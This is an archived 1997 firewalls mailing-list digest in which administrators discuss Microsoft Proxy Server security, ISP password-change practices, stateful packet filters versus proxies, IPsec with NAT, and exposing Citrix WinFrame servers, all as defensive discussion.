Remote Administration via Internet Service Manager allows Microsoft Proxy >> Server to be managed from any Windows NT system on the network. >> correct me if I am wrong but if you use the http administration utility, the passwords are transported in *ENCODED* *CLEAR TEXT* authentication and hence you would be mad to administer the proxy via this method. However I do not know weather this administration can occur through the internet side of the server. It would be a major breach of security it was! I suspect this will only be the case if you were allowing web publishing on the same server, ie allowing listening on port 80. *NOT* a good thing to do at all. Any bugger on the internet would be able to try to logon as an administrator!!!!!!!! One would hope MS would have denied this service to ips in the proxy's LAT, but they seem to be hinting in their so called "security" manual that this is a risk, but do not specify weather this is just for normal proxy usage or also the administration service. Anybody any ideas? >> Integrates with NT network security domain model - Microsoft Proxy Server >> extensively leverages the network-based Windows NT domain security model to >> manage access permission and logging. >> >You must use "Trust" to connect those domains together. And, the "Trust" >can be >compromised to make the NT trust anybody. Sounds scary . . . .! >> Well to be more specific you can make the trust one way as in DomainLAN is "Trusted" by DomainProxy but DomainProxy is not "Trusted" by DomainLAN. The issue then becomes one of how secure is the trusting implementation in NT. You would have to work for MS to find out as they give bugger all information out! >> Massive Scalability - Microsoft Proxy Server's cache is limited only by >> Windows NY Server system resources. >> >Can NT scale up to 64 processors, like the SUN servers? Or 12 >processors, like the >Alpha servers. >> Yes, the NT box makes a nice stand to put your Sun and Alpha servers on :-) Dose anybody know weather MS Proxy uses the RPC service on the NT box. I am interested on the ports you would have to open to administer and establish trust to a proxy on the other side of a firewall. MS say nothing of any help! Ever called connections? My sister know more about these issues than every MS bod I have ever talked to there! laters simon -- Simon Foley From owner-firewalls-outgoing Sat Jun 7 03:46:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA16520 for firewalls-outgoing; Sat, 7 Jun 1997 03:43:36 -0700 (PDT) Received: from scifi.squawk.com (scifi.squawk.com [199.74.151.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA16513 for ; Sat, 7 Jun 1997 03:43:28 -0700 (PDT) Received: from localhost (njs@localhost) by scifi.squawk.com (8.8.5/8.8.5) with SMTP id GAA16263; Sat, 7 Jun 1997 06:47:30 -0400 Date: Sat, 7 Jun 1997 06:47:29 -0400 (EDT) From: Nick Simicich X-Sender: njs@scifi To: Norman Widders cc: firewalls@GreatCircle.COM Subject: RE: ISP Connection In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 7 Jun 1997, Norman Widders wrote: > One has to make a phone call to them everytime you want to > change it. My concern is what is there to prevent eavesdropping > when saying the password over the telephone. Do any other > ISP's practice this worrying method ? > > What do you think, is this a safe practice for the ISP > to be employing ? Do you think it is more likely that someone will sniff your session when you change your password, or tap your telephone? I think that the risks are more or less comparable. Of course my password is the same as my pet's name. My macaw's name was Q47pY!3, but I change it every 90 days. Nick Simicich mailto:njs@scifi.squawk.com or (last choice) mailto:njs@us.ibm.com http://scifi.squawk.com/njs.html -- Stop by and Light Up The World! From owner-firewalls-outgoing Sat Jun 7 05:31:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA22801 for firewalls-outgoing; Sat, 7 Jun 1997 05:24:15 -0700 (PDT) Received: from freenet.grfn.org (grfn.org [206.30.236.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA22775 for ; Sat, 7 Jun 1997 05:24:04 -0700 (PDT) Received: from homer ([206.67.160.132]) by freenet.grfn.org (8.8.5/8.8.5) with ESMTP id IAA29450; Sat, 7 Jun 1997 08:22:35 -0400 (EDT) Message-ID: <3399539C.56467F1C@grfn.org> Date: Sat, 07 Jun 1997 08:27:09 -0400 From: Mariko Yashada X-Mailer: Mozilla 4.0b5 [en] (Win95; I) MIME-Version: 1.0 To: winspace@geko.net.au CC: firewalls@GreatCircle.COM Subject: Re: ISP Connection X-Priority: 3 (Normal) References: Content-Type: text/plain; charset=iso-8859-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk No, this is not a good practice. For a while we had to give the ISP the user id and password for a new user. We insisted, then threatened to go to another ISP if they didn't come up with a way for users to change their passwords. They now have a password change page at their site. We now issue a generic password to new users. They then change the password as part of their training class. We also have the ISP expire existing passwords every 90 days. I know there are holes in the password change procedure since the information goes across in the clear, but its better than having a group of internal people knowing everyone's ISP password. Mariko Norman Widders wrote: > A certain ISP has set it so you can not change your password > using the passwd command. > > One has to make a phone call to them everytime you want to > change it. My concern is what is there to prevent eavesdropping > when saying the password over the telephone. Do any other > ISP's practice this worrying method ? > > What do you think, is this a safe practice for the ISP > to be employing ? > > -- > +--------------------------------------------------------------+ > | #include | > | | > | E-MAIL: winspace@geko.net.au | > | HOMEPAGE: http://www.geocities.com/ResearchTriangle/4431 | > | | > +--------------------------------------------------------------+ From owner-firewalls-outgoing Sat Jun 7 06:46:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA27348 for firewalls-outgoing; Sat, 7 Jun 1997 06:39:13 -0700 (PDT) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA27332 for ; Sat, 7 Jun 1997 06:39:04 -0700 (PDT) Received: from clonvick-pc.cisco.com (sj-dial-3-2.cisco.com [171.68.179.3]) by diablo.cisco.com (8.8.5/CISCO.SERVER.1.2) with SMTP id GAA03346; Sat, 7 Jun 1997 06:42:36 -0700 (PDT) Message-Id: <2.2.32.19970607134128.0070cc54@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 07 Jun 1997 08:41:28 -0500 To: "Simon J. Gerraty" , Ryan Russell/SYBASE From: Chris Lonvick Subject: Re: Stateful Packet Filters vs. Proxies Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Simon, I think that you meant to say that Crypto and NAT do not mix. That's always been the case with all types of NATificating firewalls, whether they be proxies or stateful packet filters. This has long been recognized as a problem and was even identified in the first group of IPSEC RFCs. When you're using the Transport Mode encryption as described in 1827, only the payload is encrypted and the header is the actual header as it would normally be sent from the device. When this passes the NATificator, only the header addresses can be translated. Any information embedded in the payload cannot be identified by the NATificator, and therefor cannot be translated. So, in your case, the header was probably translated but the embedded addresses in the payload were not. This would certainly cause confusion with the process and would not allow the session to complete. The workaround (I think that it's identified in 1825) is to use AH between the workstation and the NATificating firewall, and then let the firewall perform ESP. In this way, the payload is protected by the hash in the AH before it reaches the firewall. The firewall will then perform the ESP to provide confidentiality as it crosses an untrusted network (i.e. the Internet). At this time, however, the PIX does not work that way, and I can't think of any firewalls (of any type) to do. If you use NAT and Crypto together, the proxy firewall would have to know the session keys to be able to de-crypt the payload so that it could 1 - identify the session type (telnet, ftp, http, etc.) 2 - NAT any header information contained in the payload The proxy would then have to re-encrypt the packet and send it along its merry way. This, besides being exceptionally computationally intensive, is a bad idea since keys should only be exchanged between the endpoints. I actually havn't heard of any of any firewall device which does this. I think that the firewalls that do perform this just provide a stateful forwarding process to deal with AH/ESP-transport mode sessions which connect an internal device to an external device. If anyone knows differently, please respond back to the list. Try running your test again without NAT. I expect that it will work since the header information will always agree with any embedded information and the PIX (or any other type of firewall) will not have to muck around with address translation. Hope this helps, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1.713.778.5663 At 04:19 PM 6/7/97 +1000, Simon J. Gerraty wrote: >Ryan Russell writes: >>Well, I finally got around to writing down my arguments >>on the above subject. Check it out at: > >>>I hope to convince the reader, to whatever degree I can, of the following: > >>> 1.Proxies are a special case of a SPF. >>> 2.SPFs can be the more secure choice depending on the requirements. >>> 3.Network address translation (NAT) can be considered a form of >>> security on it's own. > >One thing to note - SPF and crypto do not mix. > >I saw a case last week where users behind a PIX firewall could not use >an encrypted FTP, because the PIX box could not inspect the content of >PORT commands and allow the data ports to be connected to. > >Solutions are: > >1. Use passive mode transfers. >2. Turn off the filtering in the PIX :-) >3. Do without crypto :-) > >1 is obviously preferable if both sides can handle it - not always the >case. The other two are not attractive at all. If they'd been using >a proxy, they would not have had a problem. > >--sjg >-- >Simon J. Gerraty > >#include /* imagine something _very_ witty here */ > > From owner-firewalls-outgoing Sat Jun 7 07:16:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA29363 for firewalls-outgoing; Sat, 7 Jun 1997 07:04:46 -0700 (PDT) Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA29331 for ; Sat, 7 Jun 1997 07:04:36 -0700 (PDT) Received: (from uucp@localhost) by zen.quick.com.au (8.8.5/8.7.3) id AAA13097; Sun, 8 Jun 1997 00:08:39 +1000 (EST) Message-Id: <199706071408.AAA13097@zen.quick.com.au> Received: from localhost(127.0.0.1) by zen.quick.com.au via smap (V1.3) id sma013095; Sun Jun 8 00:08:16 1997 To: Chris Lonvick cc: "Simon J. Gerraty" , Ryan Russell/SYBASE , firewalls@greatcircle.com Subject: Re: Stateful Packet Filters vs. Proxies In-reply-to: Your message of "Sat, 07 Jun 97 08:41:28 EST." <2.2.32.19970607134128.0070cc54@diablo.cisco.com> Date: Sun, 08 Jun 1997 00:08:13 +1000 From: "Simon J. Gerraty" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris, Thanks for the info. > I think that you meant to say that Crypto and NAT do not mix. I guess that's true too, but no, I really meant what I said... > actual header as it would normally be sent from the device. When this > passes the NATificator, only the header addresses can be translated. > Any information embedded in the payload cannot be identified by the > NATificator, and therefor cannot be translated. So, in your case, the Correct, and this was indeed a problem. However I was able to configure my ftp proxy to ignore the address part of the PORT command and just use the port number - thus working around the NAT problem. [BTW, the ftp sessions we are talking about are outbound through their PIX f/w and in-bound through my proxy based f/w - hence my requirement for crypto.] They still could not get a data session going because the PIX was blocking the inbound data connections - we presume because it had not seen the port in the PORT command and therefore not opened a window of opportunity... If the above assumption is correct - and the folk who ran the PIX thought it was, then even with NAT turned off, the encrypted FTP was never going to work. So we get back to SPF and crypto don't mix :-) --sjg From owner-firewalls-outgoing Sat Jun 7 09:01:14 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA05898 for firewalls-outgoing; Sat, 7 Jun 1997 08:50:49 -0700 (PDT) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA05883 for ; Sat, 7 Jun 1997 08:50:44 -0700 (PDT) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id LAA06262; Sat, 7 Jun 1997 11:54:47 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id LAA03808; Sat, 7 Jun 1997 11:54:42 -0400 (EDT) Date: Sat, 7 Jun 1997 11:54:42 -0400 (EDT) Message-Id: <199706071554.LAA03808@SPARKY.CF.CS.YALE.EDU> To: firewalls@GreatCircle.COM, gaarder@actech.com, kgunther@nassau.cv.net Subject: Re: Does Winframe need a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steven Gaarder writes >Ken Gunther writes: > > Is Winframe safe to put directly on the untrusted network? We are worried > > about unauthorized people getting through to the trusted side as well as > > denial of service attacks where people try to crash Winframe. > > Ken (kgunther@nassau.cv.net) > >I'd treat it like any other NT box, which is to say that *I* wouldn't >put it directly on an untrusted net. If all you want to do is provide >Winframe, one approach would be to put a second ethenet card in the >machine and connect it to the untrusted network through a filtering >router, letting only the ICA port through. I'd be real cautious about allowing Internet access to a Citrix WinFrame server running either on the safe secure internal network or in the DMZ/ perimeter net or straddling both. This is because if the remote ICA client app has access to running a winsock app on the server machine it then has the ability to appear to have an IP address on your local network -- which will often get it access that you do not intend. I've played around a bit with Insignia's NTrigue (a modified NT 3.51 server with Citrix code -- a 4.0 server should soon be available) and had no problems running the win32 telnet, ftp, Internet Explorer, etc from remote Mac ICA clients and Unix X windows machines. I'd definitely recommend removing telnet, ftp, IE and any other winsock apps from any machine you are going to use as a WinFrame server exposed to the Internet so as to prevent "island-hopping" attacks. - H. Morrow Long, Yale Univ. IT Information Security From owner-firewalls-outgoing Sat Jun 7 09:31:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA07548 for firewalls-outgoing; Sat, 7 Jun 1997 09:21:15 -0700 (PDT) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA07513 for ; Sat, 7 Jun 1997 09:21:05 -0700 (PDT) Message-Id: <199706071621.JAA07513@honor.greatcircle.com> Received: from [192.168.1.202] by cat.bbsr.edu (SMTPD32-3.04) id AAF272A4033C; Sat, 07 Jun 1997 13:23:14 -0300 From: "Jamie Thain" To: "Kelly E. Gibbs" , "Ryan Russell/SYBASE" Cc: "Bill Stout" , "firewalls" Subject: Re: Stateful Packet Filters vs. Proxies Date: Sat, 7 Jun 1997 13:24:18 -0300 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kelly, I would think a NAT works at layer 3. It cannot be 4, as that is where TCP/UDP resides and a NAT works on IP address (at least firewall-1's) Layer three is described in part as... Finding a route between a source and a destination node or between two intermediate devices. The Network Press, Encyclopedia of Networking, Pg 753 (OSI Models) regards:jamie From owner-firewalls-outgoing Sat Jun 7 09:46:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09788 for firewalls-outgoing; Sat, 7 Jun 1997 09:40:54 -0700 (PDT) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA09777 for ; Sat, 7 Jun 1997 09:40:47 -0700 (PDT) Message-Id: <199706071640.JAA09777@honor.greatcircle.com> Received: from [192.168.1.202] by cat.bbsr.edu (SMTPD32-3.04) id AFA58FF1033C; Sat, 07 Jun 1997 13:43:17 -0300 From: "Jamie Thain" To: , "Ken Gunther" Subject: Re: Does Winframe need a firewall? -- Winframe Proxy Date: Sat, 7 Jun 1997 13:44:21 -0300 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken, I would suggest using a Firewall for the citrix. Did you try to turn up the speed on your linux. Moving to a Pentium Pro with 64 Mb of RAM, and fast PCI network cards should fix the latency problem. Also if you check on the Citrix site there is a FAQ on how to increase the key response time on TCP/IP. If you can't find it you can send me an email privately and I will send it to you. The issue with the Citrix is not so much the Winframe itself, as the other ports the NT box would leave open. Obviously you could also put up a Winframe Proxy (another Winframe Server) and have a second logon to the second winframe from the first over some non-TCP/IP and make the external Winframe the patsy. But users tend to find this clumbsy... regards:jamie Citrix Gold Solutions Provider From owner-firewalls-outgoing Sat Jun 7 11:55:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA03797 for firewalls-outgoing; Sat, 7 Jun 1997 11:40:20 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00923 for ; Sat, 7 Jun 1997 11:17:01 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id KAA26189 for ; Sat, 7 Jun 1997 10:46:38 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id KAA24629 for ; Sat, 7 Jun 1997 10:47:50 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA24412; Sat, 7 Jun 97 10:45:38 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id KAA13731 for @sybgate.sybase.com:firewalls@greatcircle.com; Sat, 7 Jun 1997 10:44:29 -0700 (PDT) Message-Id: <199706071744.KAA13731@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id B45161229CD58223882564AF00620E80; Sat, 7 Jun 97 10:44:27 EDT To: "Simon J. Gerraty" Cc: Ryan Russell/SYBASE , firewalls From: Ryan Russell/SYBASE Date: 7 Jun 97 10:51:19 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A proxy would have the same problem. Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: firewalls From: sjg @ quick.com.au ("Simon J. Gerraty") @ smtp Date: 06/07/97 04:19:41 PM Subject: Re: Stateful Packet Filters vs. Proxies Ryan Russell writes: >Well, I finally got around to writing down my arguments >on the above subject. Check it out at: >>I hope to convince the reader, to whatever degree I can, of the following: >> 1.Proxies are a special case of a SPF. >> 2.SPFs can be the more secure choice depending on the requirements. >> 3.Network address translation (NAT) can be considered a form of >> security on it's own. One thing to note - SPF and crypto do not mix. I saw a case last week where users behind a PIX firewall could not use an encrypted FTP, because the PIX box could not inspect the content of PORT commands and allow the data ports to be connected to. Solutions are: 1. Use passive mode transfers. 2. Turn off the filtering in the PIX :-) 3. Do without crypto :-) 1 is obviously preferable if both sides can handle it - not always the case. The other two are not attractive at all. If they'd been using a proxy, they would not have had a problem. --sjg -- Simon J. Gerraty #include /* imagine something _very_ witty here */ From owner-firewalls-outgoing Sat Jun 7 12:10:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA03869 for firewalls-outgoing; Sat, 7 Jun 1997 11:41:27 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA03346 for ; Sat, 7 Jun 1997 11:24:12 -0700 (PDT) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id KAA24974 for ; Sat, 7 Jun 1997 10:11:49 -0700 (PDT) Message-Id: <199706071711.KAA24974@miles.greatcircle.com> Received: from [192.168.1.202] by cat.bbsr.edu (SMTPD32-3.04) id A55348280328; Sat, 07 Jun 1997 14:07:31 -0300 From: "Jamie Thain" To: , , Cc: Subject: Re: Microsoft Proxy Server Date: Sat, 7 Jun 1997 14:08:36 -0300 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Daniel, I would suggest that a microsoft proxy server on its own is not an industrial strength solution. The reasons are many, but simply put, it is up to the careful configuration of a single access point to allow or deny services. I would, and do always recommend that any hacker coming into a site has to jump at least three hurdles before arriving at the inside, and any one of those hurdles would provide "adequate" firewall protection on their own. For example, if someone turned on the "Publish Web Pages" on the MS proxy, it goes from strong to very weak. However if you put up the MS Proxy behind a Cisco PIX and infront of a Winframe server, then you have a pretty secure site. The DMZ needs to be between the PIX and the Proxy, and the Proxy is an "internal" firewall. The citrix Winframe prevents Java Nasties from getting the local workstation. More is better, cheap is not. regards:jamie ---------- > From: Daniel_Yamaguchi@iscci.com > To: Dick_Wall@stratus.com; firewalls@greatcircle.com > Cc: jmartin@iscci.com > Subject: Microsoft Proxy Server > Date: Friday, May 23, 1997 9:21 PM > > > > > > Dick - > > Please find below information regarding Microsoft Proxy Server. We, at ISC > Computers & Communications, Inc. feel that this solution will meet your > current needs regarding Internet Security. > > Please call me if you have any questions. > > Thank you, > > Daniel T. Yamaguchi > Marketing Mgr. > ISC Computers & Communications, Inc. > > > All About Microsoft Proxy Server > > Security > > Microsoft Proxy Server was designed with firewall-class security. Many > organizations will run their proxy servers in direct contact with the > Internet alongside such devices as packet-filtering routers and firewalls. > A proxy server needs to be just as secure as these devices. > > Microsoft's Proxy Server was subjected to extensive security testing and > evaluation from independent testing agency, Coopers & Lybrand's Information > Technology Security Services and is resistant to common attacks such as "IP > Spoofing", 'SATAN", and "ISS." This level of security is not typically > found other proxy servers on the market. > > Manageability & Ease of Use > > Microsoft Proxy Server is often used by small-medium sized business as the > primary gateway onto the Internet. In these environments, leveraging the > familiarity and ease of use of the Windows NT platform is paramount. > > Integrated with NT User Directory Services, Microsoft Proxy Server allows: > > Integrated Dial-Up Networking Support- using the Auto-Dial tool, Microsoft > Proxy Server provides exceptional support for networks that use dial-up > links for access to the Internet. > > Easy Installation through a full graphical set up program. > > Easy Administration provided by a clean, easy to understand and easy to > administer interface. > > Requires only One Internet IP address for a site by providing a single > point of management for all of an organization's Internet connectivity. > This reduces costs by making overall system not only easier to manage, but > also by requiring fewer "pipe" purchases by organizations. > > Remote Administration via Internet Service Manager allows Microsoft Proxy > Server to be managed from any Windows NT system on the network. > > Integrated with NT network system management services Microsoft Proxy > Server generates a suite of Windows NT Performance Counters for monitoring > the state of any Proxy Server on the network. > > Integration with SNMP allows the administrator to examine the current > status of any Microsoft Proxy Server on the network using an SNMP console > such as HP Open View. > > Web Proxy > > The Web Proxy component of Microsoft Proxy Server supports the industry > standard CERN-Proxy protocol. The CERN-Proxy protocol requires that client > programs be specifically configured to use the proxy server in order to > access the Internet via a modified version of the HTTP protocol and is > widely supported in popular browsers. > > Multi-Vendor Support - The Web Proxy Serve supports all popular web > browsers including: > Microsoft Internet Explorer 3.0 > Netscape Navigator 3.0 > PointCast Network > Multi-Platform Support - The Web Proxy Server supports all platforms > including: > Windows NT Server > Windows NT Workstation > Windows '95 > Windows for Workgroups/Win 3.1 > UNIX > Macintosh > Browser Protocols - The Web Proxy Server supports: > HTTP > FTP > Gopher > SSL (HTTPS & SNEWS) > WinSock Proxy > > Unlike the Web Proxy, the WinSock Proxy component provides extended, > transparent functionality past the HTTP, FTP, Gopher, & SSL protocol suite > into a wide range of non-Web protocols such as streaming audio & video. > Whereas the Web Proxy requires explicit client knowledge of the proxy, the > WinSock Proxy operates transparently without any modification to the client > program's protocol. > > The WinSock Proxy remotes" calls made by the Internet clients to the > industry standard WinSock 1.1 API to the Proxy server providing seamless > connectivity for these clients. > > Transparent Operation - WinSock Proxy requires no modifications to client > applications therefore working with existing clients. > > Generic support for all protocols - Any client -server protocol implemented > using the industry -standard WinSock 1.1 API can be enabled/disabled from > the WinSock Proxy Server. The WinSock Proxy ships pre-configured with a > wide range of popular protocols (e.g. Real Audio, NetShow, IRC) and can be > easily configured with the new protocol suites via a graphical tool as they > are standardized (e.g. LDAP) > > Support for connectionless/UDP protocols - Unlike other Proxies, the > WinSock Proxy supports connectionless protocols. SOCKS v4-based proxies, > for example, are only functional with "connection-oriented" transports and > therefore exclude support for popular protocols such as streaming audio and > video. > > Full authentication/logging - WinSock Proxy performs full access control, > encrypted authentication, and logging of all transactions. > > Network Compatibility > > One of the best features of Microsoft Proxy Server is the use of WinSock > Proxy to seamlessly provide a gateway between an administrator's existing > IPX network infrastructure and IP-based network services. > > Integrates with IPX Networks - Unlike other proxy servers, Microsoft Proxy > Server doesn't require administrators to "rip & replace" existing, legacy > IPX networks with IP networks. This effectively preserves infrastructure > investments. > > Integrates with NT network security domain model - Microsoft Proxy Server > extensively leverages the network-based Windows NT domain security model to > manage access permission and logging. > > Caching > > Reduced Internet Bandwidth Requirement - By keeping local copies of popular > Internet objects and achieving cache hit rates up to 50%, the Web Proxy > averts the need to upgrade/ expand Internet connection bandwidth thereby > saving organizations money. > > Improved Client Performance - Because cached objects are retrieved at LAN > speeds, clients achieve both increased throughput and reduced latency. > > Active caching adds intelligence to on-demand replication - Through > sophisticated statistical analysis of usage trends, Microsoft Proxy Server > proactively fetches objects from the Internet before the user is expected > to request the object himself. > > Active caching results in Time-Shifting - Active caching takes into > account the load on the server as it makes its individual object pre-fetch > decision. The result of this metric is that active caching activity is > shifted towards periods of low server utilization (e.g. overnight) > "preparing" the cache for high traffic periods later in the day. > > Massive Scalability - Microsoft Proxy Server's cache is limited only by > Windows NY Server system resources. > > Integration with Other Environs - Microsoft Proxy Server supports the > industry standard CERN-compatible proxy services, therefore can work with > almost all existing Internet browsers and other applications that use the > CERN proxy standard. > > Extensibility > > Microsoft Proxy Server fully supports the multi-vendor ISAPI Filter > specification enabling third parties to write value-enhancing add-ons to > the Proxy server. Check out a list of current third party add-ons. These > extensions provide functionality such as: > > Virus Scanning > > Advanced content/site filtering > > Pricing > > The price for Microsoft ProxyServer is $899.00. > > > From owner-firewalls-outgoing Sat Jun 7 14:55:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15698 for firewalls-outgoing; Sat, 7 Jun 1997 14:46:41 -0700 (PDT) Received: from fes3.cs.tol.it (mail.tin.it [194.243.154.39]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15691 for ; Sat, 7 Jun 1997 14:46:35 -0700 (PDT) Received: from turiddu.tin.it (Venezia6-8.tin.it [195.31.135.135]) by fes3.cs.tol.it (8.8.4/8.8.4) with SMTP id XAA29238 for ; Sat, 7 Jun 1997 23:42:33 +0200 (MET DST) Message-ID: <3399D6C8.3755@tin.it> Date: Sat, 07 Jun 1997 23:46:48 +0200 From: nibble Reply-To: nibble@tin.it X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: ascend routers... Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, mi name's Nibble, plz someone can tell me where can I find complete documentation about Ascend routers ? TNX in advance... The Nibble From owner-firewalls-outgoing Sat Jun 7 15:40:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA19939 for firewalls-outgoing; Sat, 7 Jun 1997 15:38:22 -0700 (PDT) Received: from mailhost.onramp.net (mailhost.onramp.net [199.1.11.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA19932 for ; Sat, 7 Jun 1997 15:38:17 -0700 (PDT) Received: from sage1 (sage1.doogie.com [206.50.2.2]) by mailhost.onramp.net (8.8.5/8.8.5) with ESMTP id RAA22555; Sat, 7 Jun 1997 17:38:32 -0500 (CDT) Message-Id: <199706072238.RAA22555@mailhost.onramp.net> From: "Jerry McKane" To: , Subject: Re: ascend routers... Date: Sat, 7 Jun 1997 17:40:07 -0500 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk www.ascend.com ---------- > From: nibble > To: firewalls@GreatCircle.COM > Subject: ascend routers... > Date: Saturday, June 07, 1997 4:46 PM > > Hi all, > mi name's Nibble, plz someone can tell me where can I find > complete documentation about Ascend routers ? > > TNX in advance... > > > The Nibble From owner-firewalls-outgoing Sat Jun 7 15:55:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA21287 for firewalls-outgoing; Sat, 7 Jun 1997 15:53:34 -0700 (PDT) Received: from home.byelex.nl (home.byelex.nl [195.109.44.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA21280 for ; Sat, 7 Jun 1997 15:53:29 -0700 (PDT) Received: (from cowboy@localhost) by home.byelex.nl (8.8.5/8.8.5) id AAA04810; Sun, 8 Jun 1997 00:54:05 +0200 Date: Sun, 8 Jun 1997 00:54:04 +0200 (MET DST) From: Kevin McPeake To: firewalls@GreatCircle.COM Subject: Hosting ActiveX applets In-Reply-To: <039FA3395666B4AD*/c=us/admd=BellSouth/prmd=bis/o=ccmail/s=Frataccia/g=Rick/@MHS> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Okay, I hope someone can help me here. I've seen all the arguements for why ActiveX should not be allowed into our corperate network via the Internet. Can someone tell me if there's any good reasons why we should not allow ActiveX on our Web server to be served to visiting web browsing clients? If the ActiveX component that we serve to clients, considered a security risk for our internel network / web server? Any input would be really appreciated. Kev Kevin McPeake cowboy@home.byelex.nl Internet Consultant http://www.byelex.nl/ << You know something's up when your Thought process is idle. >> USER PID %CPU %MEM VSZ RSS TTY S STARTED TIME COMMAND cowboy 28365 0.0 0.2 2.84M 264K ttyp1 S 12:57:12 0:00.02 Thought From owner-firewalls-outgoing Sat Jun 7 17:25:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA28490 for firewalls-outgoing; Sat, 7 Jun 1997 17:17:23 -0700 (PDT) Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA28483 for ; Sat, 7 Jun 1997 